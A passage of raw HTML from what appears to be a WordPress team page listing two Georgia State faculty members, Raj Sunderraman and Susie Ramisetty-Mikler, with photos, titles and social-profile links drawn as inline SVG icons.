11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-sunderraman1-e1697143080973.jpeg\" class=\"wp-image-1668 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697143162762.png\" class=\"wp-image-1670 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  